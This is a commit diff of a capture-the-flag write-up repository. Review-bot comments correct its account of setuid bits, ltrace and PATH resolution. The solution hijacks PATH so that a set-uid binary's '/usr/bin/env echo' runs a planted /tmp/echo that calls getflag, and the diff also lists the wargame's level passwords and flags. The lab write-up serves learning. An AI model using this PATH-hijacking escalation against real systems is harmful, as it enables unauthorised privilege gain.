Merge branch 'main' of https://github.com/nuoxoxo/cfo into main
nuoxoxo committed Nov 17, 2024
2 parents 5c5b3f0 + a6a871b commit 4684d29
Showing 3 changed files with 80 additions and 34 deletions.
57 changes: 40 additions & 17 deletions README.mdx
@@ -1,12 +1,13 @@
```b
flag00 nottoohardhere
level01 x24ti5gi3x0ol2eh4esiuxias
flag01 abcdefg
level02 f2av5il02puano7naaf6adaaf
flag02 ft_waNDReL0L
level03 kooda2puivaav1idi4f57q8iq
level04 qi0maab88jeaj46qoumi7maus
level05 ne2searoevaevoem4ov4ar8ap
flag00 nottoohardhere
flag01 abcdefg
flag02 ft_waNDReL0L
```
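Review bot: the reordering in this hunk drops the chain the old alternating order made visible (the flag recovered at one level is the login password for the next): the three `flagNN` entries now sit in a block after `level05`, so a reader has to count lines to match `flag02` with `level03`. Either keep the alternating order or write each pair on one line (`level03 kooda2puivaav1idi4f57q8iq -> flag03 ...` once known). Minor: the fence tag ```b is not a language any highlighter recognises; `text` or no tag reads cleaner.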


@@ -187,13 +188,37 @@ Password: ft_waNDReL0L
- Inspect
- ❌ `file` `readelf` `strings`
- βœ… `ltrace`
```b
```
> ls -l
-rwsr-sr-x 1 flag03 level03 8627 level03
^ ^ setuid bit & setgid bit are set
πŸ‘‰ when the binary is exec functions called inside it
are called under same level of permission
^^^ owner flag03 can rwx also setuid bit is set
^^^ group level03 can rx plus setgid bit (s) is set
^^^ others can rx
πŸ‘‰ when ./level03 is run
the entire process runs with owner flag03's priviledges
ie. I, user level00, can exploit priviledges limited to flag03
πŸ‘‰ conclusion: execute the ./level03 and doing so we gain
temporary elevated permissions as flag03
```

- We may also try `id` & `namei`

```b
> id
uid=2003(level03) gid=2003(level03) groups=2003(level03),100(users)
> namei -l ./level03
dr-x------ level03 level03 .
-rwsr-sr-x flag03 level03 level03
> namei -l /bin/getflag
-rwxr-xr-x root root getflag
```

- `ltrace` traces library function calls when the binary is executed

```b
> ltrace ./level03
πŸ‘‰ we can see the `s` bit in action
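Review bot: the walk-through names the wrong user: `ie. I, user level00, can exploit priviledges limited to flag03` contradicts the `id` output two blocks below (`uid=2003(level03)`), so it should read `level03` (and `privileges`). The closing line `we can see the s bit in action` under `ltrace` is also the opposite of what happens: when an unprivileged user runs a set-uid/set-gid binary under ptrace, the kernel does not honour the `s` bits, which is exactly why the traced `geteuid()` still returns 2003 rather than flag03's uid. Worth one sentence saying that `ltrace` reveals the call sequence but not the elevated IDs; those only apply when `./level03` is run directly.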
@@ -206,21 +231,19 @@ setresuid(2003, 2003, 2003, 0xb7e5ee55, 0xb7fed280) = 0
system("/usr/bin/env echo Exploit me" ...
### observations
πŸ‘‰ getegid & geteuid return a effective group/user ID ie. 2003
πŸ‘‰ setresgid & setresuid set Real/Effective/Saved ID to ensure
that the process maintains privileges
πŸ‘‰ `/usr/bin/env echo` uses a vulnerable relative path
since ./level03 has high privileges,
we can fake a false echo to run getflag inside ./level03
```
```b
> whereis getflag
getflag: /bin/getflag
πŸ‘‰ getegid & geteuid return a effective group/user ID 2003
which is my `id` as `level03`.
πŸ‘‰ Because privileges are elevated during the process
we have temporary permissions as `flag03`.
πŸ‘‰ This way we can exploit the `/usr/bin/env echo`
relative path vulnerability.
```

- Solution

```b
> whereis getflag
getflag: /bin/getflag
> echo -e "#\!/bin/bash\n/bin/getflag" > /tmp/echo
> chmod +x /tmp/echo
> export PATH=/tmp:$PATH πŸ‘ˆ prepend tmp to get it checked first
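Review bot: `/usr/bin/env echo uses a vulnerable relative path` mislabels the bug: `/usr/bin/env` is an absolute path, and the weakness is that `env` resolves its argument `echo` through the caller-controlled `PATH` (execvp) while the set-uid program neither hard-codes `/bin/echo` nor resets the environment before `system()`. Saying that also explains why `export PATH=/tmp:$PATH` is the step that makes the attack work. Two smaller points in the same hunk: the second fenced block (`getegid & geteuid return ... 2003 which is my id as level03`) restates the first observations block almost word for word, so one should go; and in an interactive bash `echo -e "#\!/bin/bash\n/bin/getflag"` writes a literal `#\!/bin/bash`, because bash keeps the backslash before `!` inside double quotes and `echo -e` does not know `\!`, so `/tmp/echo` has no valid shebang and only runs because execvp falls back to `/bin/sh` on ENOEXEC. `printf '#!/bin/bash\n/bin/getflag\n' > /tmp/echo` avoids both history expansion and the stray backslash.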
50 changes: 36 additions & 14 deletions level03/README.mdx
@@ -3,13 +3,37 @@
- Inspect
- ❌ `file` `readelf` `strings`
- βœ… `ltrace`
```b
```
> ls -l
-rwsr-sr-x 1 flag03 level03 8627 level03
^ ^ setuid bit & setgid bit are set
πŸ‘‰ when the binary is exec functions called inside it
are called under same level of permission
^^^ owner flag03 can rwx also setuid bit is set
^^^ group level03 can rx plus setgid bit (s) is set
^^^ others can rx
πŸ‘‰ when ./level03 is run
the entire process runs with owner flag03's priviledges
ie. I, user level00, can exploit priviledges limited to flag03
πŸ‘‰ conclusion: execute the ./level03 and doing so we gain
temporary elevated permissions as flag03
```

- We may also try `id` & `namei`

```b
> id
uid=2003(level03) gid=2003(level03) groups=2003(level03),100(users)
> namei -l ./level03
dr-x------ level03 level03 .
-rwsr-sr-x flag03 level03 level03
> namei -l /bin/getflag
-rwxr-xr-x root root getflag
```

- `ltrace` traces library function calls when the binary is executed

```b
> ltrace ./level03
πŸ‘‰ we can see the `s` bit in action
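Review bot: this hunk is a verbatim copy of the section added to the top-level README.mdx in the same commit, so its defects land twice: `user level00` should be `level03` (the `id` output below says `uid=2003(level03)`), `priviledges` is misspelled, and `we can see the s bit in action` is inverted, since a set-uid binary traced by an unprivileged `ltrace` runs without the elevated IDs (hence the traced euid 2003). Pick one home for the write-up, the per-level README being the natural one, and have the other link to it; otherwise the two copies will drift.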
@@ -22,21 +46,19 @@ setresuid(2003, 2003, 2003, 0xb7e5ee55, 0xb7fed280) = 0
system("/usr/bin/env echo Exploit me" ...
### observations
πŸ‘‰ getegid & geteuid return a effective group/user ID ie. 2003
πŸ‘‰ setresgid & setresuid set Real/Effective/Saved ID to ensure
that the process maintains privileges
πŸ‘‰ `/usr/bin/env echo` uses a vulnerable relative path
since ./level03 has high privileges,
we can fake a false echo to run getflag inside ./level03
```
```b
> whereis getflag
getflag: /bin/getflag
πŸ‘‰ getegid & geteuid return a effective group/user ID 2003
which is my `id` as `level03`.
πŸ‘‰ Because privileges are elevated during the process
we have temporary permissions as `flag03`.
πŸ‘‰ This way we can exploit the `/usr/bin/env echo`
relative path vulnerability.
```

- Solution

```b
> whereis getflag
getflag: /bin/getflag
> echo -e "#\!/bin/bash\n/bin/getflag" > /tmp/echo
> chmod +x /tmp/echo
> export PATH=/tmp:$PATH πŸ‘ˆ prepend tmp to get it checked first
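Review bot: the `relative path vulnerability` wording in this hunk points at the wrong thing: `/usr/bin/env` is absolute, and what is exploited is `env` resolving `echo` through the caller-supplied `PATH` inside a set-uid process that passes its environment straight into `system()`. The second observations block duplicates the first and should be dropped, and the `echo -e "#\!/bin/bash\n/bin/getflag"` line leaves a literal backslash in the shebang under an interactive bash (the backslash before `!` in double quotes is retained), so `/tmp/echo` runs only via the ENOEXEC fallback to `/bin/sh`; `printf '#!/bin/bash\n/bin/getflag\n' > /tmp/echo` is the clean form. Since this text is duplicated in README.mdx, any fix needs to be applied to both files or the text kept in one place.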
7 changes: 4 additions & 3 deletions tokens.mdx
@@ -1,10 +1,11 @@
```b
flag00 nottoohardhere
level01 x24ti5gi3x0ol2eh4esiuxias
flag01 abcdefg
level02 f2av5il02puano7naaf6adaaf
flag02 ft_waNDReL0L
level03 kooda2puivaav1idi4f57q8iq
level04 qi0maab88jeaj46qoumi7maus
level05 ne2searoevaevoem4ov4ar8ap
flag00 nottoohardhere
flag01 abcdefg
flag02 ft_waNDReL0L
```
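Review bot: tokens.mdx now carries the same list as the top of README.mdx, reordered the same way, so the credentials live in two files that have to be kept in sync by hand; one file should be the source and the other should reference it. The reorder also hides the chain (the flag obtained at one level is the login for the next); keeping the alternating order, or putting each `levelNN` and its `flagNN` on one line, makes the list self-explanatory without a comment.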
